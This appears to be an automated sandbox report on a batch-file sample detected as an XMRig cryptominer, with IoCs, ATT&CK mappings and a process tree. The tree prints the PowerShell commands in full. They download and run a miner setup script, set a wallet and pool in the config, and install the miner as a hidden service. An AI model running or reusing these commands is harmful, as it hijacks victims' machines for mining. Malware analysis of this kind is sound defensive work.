xmrig | a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

Analysis

max time kernel
149s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2024 16:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vers1.bat
Size

393B
MD5

ece9925dc634f1cc20e3fd7ff7a144bd
SHA1

8816112e72b7b64a668bf7214999d855a7e05bde
SHA256

a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
SHA512

bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral4/files/0x0007000000023441-64.dat	family_xmrig
behavioral4/files/0x0007000000023441-64.dat	xmrig
behavioral4/memory/4840-67-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral4/memory/2328-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	1392	powershell.exe
22	3760	powershell.exe
23	3352	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4840	xmrig.exe
2784	nssm.exe
2964	nssm.exe
4700	nssm.exe
4332	nssm.exe
2588	nssm.exe
4840	nssm.exe
5100	nssm.exe
2328	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
22	raw.githubusercontent.com
23	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4136	sc.exe
1588	sc.exe
2504	sc.exe
4464	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
724	powershell.exe
3884	powershell.exe
4968	powershell.exe
1560	powershell.exe
4032	powershell.exe
1524	powershell.exe
1392	powershell.exe
4944	powershell.exe
3628	powershell.exe
3760	powershell.exe
3260	powershell.exe
3352	powershell.exe
5000	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2356	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4492	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1392	powershell.exe
1392	powershell.exe
3760	powershell.exe
3760	powershell.exe
5000	powershell.exe
5000	powershell.exe
3884	powershell.exe
3884	powershell.exe
4944	powershell.exe
4944	powershell.exe
4968	powershell.exe
4968	powershell.exe
1560	powershell.exe
1560	powershell.exe
724	powershell.exe
724	powershell.exe
3260	powershell.exe
3260	powershell.exe
4032	powershell.exe
4032	powershell.exe
3628	powershell.exe
3628	powershell.exe
3352	powershell.exe
3352	powershell.exe
1524	powershell.exe
1524	powershell.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	724	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeLockMemoryPrivilege	2328	xmrig.exe
Token: SeDebugPrivilege	692	taskmgr.exe
Token: SeSystemProfilePrivilege	692	taskmgr.exe
Token: SeCreateGlobalPrivilege	692	taskmgr.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
2328	xmrig.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe

Suspicious use of SendNotifyMessage 59 IoCs

pid	Process
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe
692	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 1392	2492	cmd.exe	81
PID 2492 wrote to memory of 1392	2492	cmd.exe	81
PID 1392 wrote to memory of 2884	1392	powershell.exe	82
PID 1392 wrote to memory of 2884	1392	powershell.exe	82
PID 2884 wrote to memory of 2792	2884	cmd.exe	83
PID 2884 wrote to memory of 2792	2884	cmd.exe	83
PID 2792 wrote to memory of 3304	2792	net.exe	84
PID 2792 wrote to memory of 3304	2792	net.exe	84
PID 2884 wrote to memory of 3284	2884	cmd.exe	85
PID 2884 wrote to memory of 3284	2884	cmd.exe	85
PID 2884 wrote to memory of 2932	2884	cmd.exe	86
PID 2884 wrote to memory of 2932	2884	cmd.exe	86
PID 2884 wrote to memory of 1592	2884	cmd.exe	87
PID 2884 wrote to memory of 1592	2884	cmd.exe	87
PID 2884 wrote to memory of 3404	2884	cmd.exe	88
PID 2884 wrote to memory of 3404	2884	cmd.exe	88
PID 2884 wrote to memory of 3120	2884	cmd.exe	89
PID 2884 wrote to memory of 3120	2884	cmd.exe	89
PID 2884 wrote to memory of 4136	2884	cmd.exe	97
PID 2884 wrote to memory of 4136	2884	cmd.exe	97
PID 2884 wrote to memory of 1588	2884	cmd.exe	98
PID 2884 wrote to memory of 1588	2884	cmd.exe	98
PID 2884 wrote to memory of 4492	2884	cmd.exe	99
PID 2884 wrote to memory of 4492	2884	cmd.exe	99
PID 2884 wrote to memory of 2356	2884	cmd.exe	100
PID 2884 wrote to memory of 2356	2884	cmd.exe	100
PID 2884 wrote to memory of 3760	2884	cmd.exe	101
PID 2884 wrote to memory of 3760	2884	cmd.exe	101
PID 2884 wrote to memory of 5000	2884	cmd.exe	102
PID 2884 wrote to memory of 5000	2884	cmd.exe	102
PID 2884 wrote to memory of 3884	2884	cmd.exe	103
PID 2884 wrote to memory of 3884	2884	cmd.exe	103
PID 2884 wrote to memory of 4840	2884	cmd.exe	104
PID 2884 wrote to memory of 4840	2884	cmd.exe	104
PID 2884 wrote to memory of 4844	2884	cmd.exe	105
PID 2884 wrote to memory of 4844	2884	cmd.exe	105
PID 4844 wrote to memory of 4944	4844	cmd.exe	106
PID 4844 wrote to memory of 4944	4844	cmd.exe	106
PID 4944 wrote to memory of 2304	4944	powershell.exe	107
PID 4944 wrote to memory of 2304	4944	powershell.exe	107
PID 2884 wrote to memory of 4968	2884	cmd.exe	108
PID 2884 wrote to memory of 4968	2884	cmd.exe	108
PID 2884 wrote to memory of 1560	2884	cmd.exe	109
PID 2884 wrote to memory of 1560	2884	cmd.exe	109
PID 2884 wrote to memory of 724	2884	cmd.exe	110
PID 2884 wrote to memory of 724	2884	cmd.exe	110
PID 2884 wrote to memory of 3260	2884	cmd.exe	111
PID 2884 wrote to memory of 3260	2884	cmd.exe	111
PID 2884 wrote to memory of 4032	2884	cmd.exe	112
PID 2884 wrote to memory of 4032	2884	cmd.exe	112
PID 2884 wrote to memory of 3628	2884	cmd.exe	113
PID 2884 wrote to memory of 3628	2884	cmd.exe	113
PID 2884 wrote to memory of 3352	2884	cmd.exe	114
PID 2884 wrote to memory of 3352	2884	cmd.exe	114
PID 2884 wrote to memory of 1524	2884	cmd.exe	116
PID 2884 wrote to memory of 1524	2884	cmd.exe	116
PID 2884 wrote to memory of 2504	2884	cmd.exe	117
PID 2884 wrote to memory of 2504	2884	cmd.exe	117
PID 2884 wrote to memory of 4464	2884	cmd.exe	118
PID 2884 wrote to memory of 4464	2884	cmd.exe	118
PID 2884 wrote to memory of 2784	2884	cmd.exe	119
PID 2884 wrote to memory of 2784	2884	cmd.exe	119
PID 2884 wrote to memory of 2964	2884	cmd.exe	120
PID 2884 wrote to memory of 2964	2884	cmd.exe	120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6580.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3304
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:3284
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:2932
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1592
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3404
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3120
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4136
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4492
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:2356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3884
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4944
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Rijtoovx\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1524
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2504
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4464
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:2784
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2964
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4700
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:4332
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2588
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:4840

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:5100
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2328

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
db4369820d734d07594caa71da58b472

SHA1
0736d74df3faf06813808545f06d0c9a4a96fa2d

SHA256
7a12f4104a7f1474aa06de0a85578f6343293df434811c7f38de2352eaf9326c

SHA512
34a26d9e9ef1cf4b9c3879b526ac73024a808e74f54855992fd69c8f29d38adaebfcc6eb0d121cfae6248a1b18a68f425ea8e6f1025df878140149478209d3aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95fe0f51cedca051753d9935e25a9519

SHA1
f842066b67a9d083abe3f74cf3b17b25e1ef2d19

SHA256
0b76c98b2c3454b25171f7e84a0a12c4d1aab7635150b074e59294df3d960883

SHA512
f548f228e79636ab9cff4fbf6b6d2b1bc3ca8cae0d4b8311d079761efb6a9ca2af606125648a74154ab5e713fafc54c8d776fca8d258bdb018794ef0ebc9218c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
633da34a38638896c9a56c65a984d48a

SHA1
1ecc48e2ec10396bbe8972facf94a28d4a20635b

SHA256
2fa8e367aeb35f24f88785d48e2058b217aa3479e61c65d25a94be0d73c98dfa

SHA512
79ee129be3599bb324d25e6c58c2b685499cb401d24860431dead811cc70841d892a24554398e65dc4e47e997e2e2c569d4f3a7cf38cedd36088897314e7d1fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e19379fa13008a264b8801e2cbb9f150

SHA1
d7fe55300709fa03accb2847278d9047e1b22fd7

SHA256
f3a21bb5091d1fab430c4fa097dac868cb674c5b3768678fe9c0ef81b920cc72

SHA512
64e3ff9b8fa46eb2fd8165d23538ffe03fb5c5096f77a800763c17795df0a6b58062b14f0807c24e73b6721fb78eee86b785e87f75a7f0ed55eda0f33811b712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6d4629e0f409ca62a9e6405ef84a890

SHA1
fffbd3a2ae2ec38fa6ea68d7e0c4842391e1affb

SHA256
d616b3b28eec6ac80107135a92819895ca8e238713c09c221d1639a43c4f525b

SHA512
bf59ede7aa59dae317092af4ce75faabec85f2b3233599bbb2a45c0a193df511438328589152bc0ae4d1b6b960ba5ecc2cf572b1faa8e3ba2077750eb3d0281d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb4d127b8a6f84a1cee423c5e3e3a51d

SHA1
c55263a8ff097067f2393ce2120801a445fd1949

SHA256
d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514

SHA512
45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98ca3263bd17f6f4308b8e4ff7530958

SHA1
6f41bacd42af6a11bb8d1516f7b07171087e7a17

SHA256
d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19

SHA512
f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2560193d633f8ba31eb1b92cc174e43b

SHA1
55af0ddc43fe63c28627968623da45fc0c0fea74

SHA256
efd907c391e98e01852551cfe18d33ef32545510406d41690cbebedf26770fe6

SHA512
